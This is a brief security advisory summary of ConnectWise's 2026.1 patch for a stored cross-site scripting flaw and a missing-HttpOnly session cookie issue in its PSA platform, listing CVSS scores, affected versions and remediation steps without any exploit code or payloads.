ConnectWise Patches High-Severity XSS and Session Cookie Vulnerabilities in PSA Platform
ConnectWise has released a security update for its Professional Services Automation (PSA) platform, addressing two vulnerabilities that could allow stored script execution and session cookie theft.
The company recommends upgrading to version 2026.1 as soon as possible.
Vulnerabilities
| CVE ID | Type | CVSS Score | Impact |
|---|---|---|---|
| CVE-2026-0695 | Cross-Site Scripting (XSS) | 8.7 (High) | Stored script execution |
| CVE-2026-0696 | Sensitive Cookie Without HttpOnly | 6.5 (Medium) | Session cookie exposure |
CVE-2026-0695 - Stored XSS
A flaw in Time Entry note handling could permit stored script execution in both the PSA web client and PSA Desktop application. Successful exploitation could lead to:
- Session hijacking
- Actions performed on behalf of authenticated users
- Access to sensitive data
CVE-2026-0696 - Cookie Exposure
A separate condition could allow client-side access to certain session cookies due to missing HttpOnly flags. This could enable attackers to steal session tokens via JavaScript.
Affected Versions
All ConnectWise PSA versions prior to 2026.1.
Remediation
- Cloud: Instances are being automatically updated
- On-premise: Apply the 2026.1 release patches and ensure all desktop clients are updated
ConnectWise has assigned this a Priority 2 (Moderate) rating, recommending installation "as soon as possible (e.g. within days)."
Why This Matters
ConnectWise PSA is widely used by managed service providers (MSPs) and IT service companies. MSP tools are frequent targets for attackers seeking to compromise multiple downstream clients through a single breach point.
